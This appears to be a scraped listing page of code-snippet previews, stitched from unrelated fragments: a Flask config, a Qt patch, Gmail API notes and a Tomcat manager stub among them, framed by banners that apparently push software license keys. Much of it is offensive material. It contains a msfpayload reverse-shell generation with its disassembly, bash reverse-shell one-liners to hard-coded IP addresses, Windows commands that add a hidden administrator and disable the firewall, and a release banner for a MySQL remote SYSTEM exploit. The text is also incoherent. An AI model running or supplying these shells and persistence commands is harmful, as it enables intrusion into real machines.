🔔 NOTE: If you can, please buy software license to support the authors/developers!
- Go to menu Help > Enter License.
- Copy the license key below and paste it into the textbox > Click the Use License button.
from flask import Flask | |
from flask.ext.sqlalchemy import SQLAlchemy | |
from flask.ext import admin, wtf | |
from flask.ext.admin.contrib import sqlamodel | |
app = Flask(__name__) | |
app.config['SECRET_KEY'] = '123456790' | |
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///test.sqlite' | |
db = SQLAlchemy(app) |
#!/usr/bin/env ruby | |
require 'ronin/network/tcp' | |
require 'ronin/ui/output/helpers' | |
require 'combinatorics' | |
include Ronin::Network::TCP, | |
Ronin::UI::Output::Helpers | |
hosts = %w[ |
root@xstpl:~# msfpayload linux/x86/shell/reverse_nonx_tcp LHOST=192.168.1.1 LPORT=4444 R > reverse_nonx_tcp.bin | |
root@xstpl:~# ndisasm -b32 -p intel reverse_nonx_tcp.bin | |
00000000 31DB xor ebx,ebx ; | |
00000002 53 push ebx ; protocol = 0 | |
00000003 43 inc ebx ; int socket(int domain, int type, int protocol); | |
00000004 53 push ebx ; type = SOCK_STREAM | |
00000005 6A02 push byte +0x2 ; domain = AF_UNIX | |
00000007 6A66 push byte +0x66 ; int socketcall(int call, unsigned long *args); | |
00000009 58 pop eax ; call = 1 (socket) | |
0000000A 89E1 mov ecx,esp ; args = domain, type, protocol ;struct sockaddr_in { |
#bash | |
/bin/sh -i >& /dev/tcp/200.93.248.46/83 0>&1 >>> nc -vvlp 83 | |
#bash | |
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 | |
#bash alt | |
exec /bin/bash 0&0 2>&0 | |
#bash alt 2 |
#add a user | |
net user xstpl mwcb /add | |
#add user to local administrators | |
net localgroup administrators /add xstpl | |
#remove firewall | |
netsh firewall set opmode disable | |
#enabled remote desktop |
--- ./qt-everywhere-opensource-src-4.8.6/src/gui/kernel/qcocoaapplicationdelegate_mac.mm 2014-06-12 10:20:38.000000000 +0300 | |
+++ ./qt-everywhere-opensource-src-4.8.6/src/gui/kernel/qcocoaapplicationdelegate_mac.mm 2014-06-12 21:59:18.000000000 +0300 | |
@@ -122,7 +122,7 @@ | |
[dockMenu release]; | |
[qtMenuLoader release]; | |
if (reflectionDelegate) { | |
- [NSApp setDelegate:reflectionDelegate]; | |
+ [[NSApplication sharedApplication] setDelegate:reflectionDelegate]; | |
[reflectionDelegate release]; | |
} |
🔔 NOTE: If you can, please buy software license to support the authors/developers!
smtp mail sending in cPython blocks the GIL. | |
This code is tested on python 2.7.8 and I'm using it with web2py | |
If you use Google Apps for your domain email and if you have admin access, you can easily use the gmail api. | |
Because you have admin access, you can create a "service account" in the Google Developer Console. | |
This makes authentication easy. | |
There are other authorisation methods when you don't have admin access, but they require interaction from the user via a browser. | |
To use this, you need to install these modules (From PyPI): | |
pyOpenSSL |
import os | |
import urllib2, base64 | |
import sys | |
import urllib | |
class TomcatManager(object): | |
def __init__(self, endpoint, username, password): | |
self.endpoint = endpoint |
*** | |
FARLiGHT ELiTE HACKERS LEGACY R3L3ASE | |
*** | |
Attached is the MySQL Windows Remote Exploit (post-auth, udf | |
technique) including the previously released mass scanner. | |
The exploit is mirrored at the farlight website http://www.farlight.org. | |
Oracle MySQL on Windows Remote SYSTEM Level Exploit zeroday | |
All owned By Kingcope |